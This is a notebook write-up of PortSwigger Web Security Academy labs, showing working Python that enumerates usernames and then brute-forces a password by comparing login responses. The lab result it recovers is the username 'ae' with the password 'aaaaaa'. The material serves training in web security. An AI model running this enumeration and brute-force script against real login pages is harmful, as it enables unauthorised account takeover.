# Different Responses
- https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses
- https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-subtly-different-responses

Code here is written for the latter but it probably still works on the former. In any case it's very simple.

In [51]:
import requests
from tqdm import tqdm
import re

In [55]:
URL = "https://acec1fd41f471d6bc00759460018003f.web-security-academy.net/"

#Load list of usernames and passwords to try
file_dir = "../../../library/text_files/"
with open(file_dir + "pw_list.txt", 'r') as f:
    passwords = [x.strip() for x in f.readlines()]
with open(file_dir + "uname_list.txt", 'r') as f:
    usernames = [x.strip() for x in f.readlines()]
    
#Start session
s = requests.session()
r = s.get(URL)

if r.status_code == 504:
    print("Env has timed out!")

In [80]:
# Enumerate Usernames

response_log_un = {}

def get_key(response_text):
    #Clean unwanted variablility from response
    variable_string = re.findall(r"analytics\?id.*/script", response_text)[0]
    key = response_text.replace(variable_string, "")
    return key, variable_string
    

for each_uname in tqdm(usernames):
    
    #payload
    data = {'username' : each_uname ,
            'password' : 'test'}
    
    r = s.post(URL + "login", data=data)
    
    #Make sure no timeout
    if r.status_code == 504:
        print("Env has timed out!")
        
    key, _ = get_key(r.text)

    if key in response_log_un.keys():
        response_log_un[key]['cnt'] += 1
        response_log_un[key]['uname'].append(each_uname)
    else:
        response_log_un[key] = {'cnt' : 1, 'uname' : [each_uname, ]}

100%|█████████████████████████████████████████████████████████████████████████████████| 101/101 [02:42<00:00,  1.61s/it]


In [83]:
response_cnt

[53, 47, 1]

In [82]:
#Take first username
response_cnt = [response_log_un[x]['cnt'] for x in response_log_un.keys()]
min_cnt = min(response_cnt)
valid_uname_arr = [
    response_log_un[x]['uname'] for x in response_log_un.keys() if (response_log_un[x]['cnt'] == min_cnt)]
valid_uname = valid_uname_arr[0]
valid_uname

['ae']

In [86]:
response_log_pw = {}

# Guess passwords
for each_pw in tqdm(passwords):
    
    #payload
    data = {'username' : valid_uname,
            'password' : each_pw}
    
    r = requests.post(URL + "login", data=data)
    
    #Make sure no timeout
    if r.status_code == 504:
        print("Env has timed out!")
        
    key, _ = get_key(r.text)
    
    #Check if response is unique
    if key in response_log_pw.keys():
        response_log_pw[key]['cnt'] += 1
        response_log_pw[key]['pw'].append(each_pw)
    else:
        response_log_pw[key] = {'cnt' : 1, 'pw' : [each_pw, ]}

100%|█████████████████████████████████████████████████████████████████████████████████| 100/100 [02:44<00:00,  1.64s/it]


In [87]:
#Validation
print([response_log_pw[x]['cnt'] for x in response_log_pw.keys()])
#Print password!
min_cnt = min([response_log_pw[x]['cnt'] for x in response_log_pw.keys()])
valid_pw_arr = [
    response_log_pw[x]['pw'] for x in response_log_pw.keys() if (response_log_pw[x]['cnt'] == min_cnt)]
valid_pw = valid_pw_arr[0]
valid_pw

[39, 33, 1, 17, 10]


['aaaaaa']

Yay success.

Note that from drilling into the responses the difference was that if the username is correct there is a full stop in the "Your username or password is incorrect[.]" text.

# Timing Attacks
https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing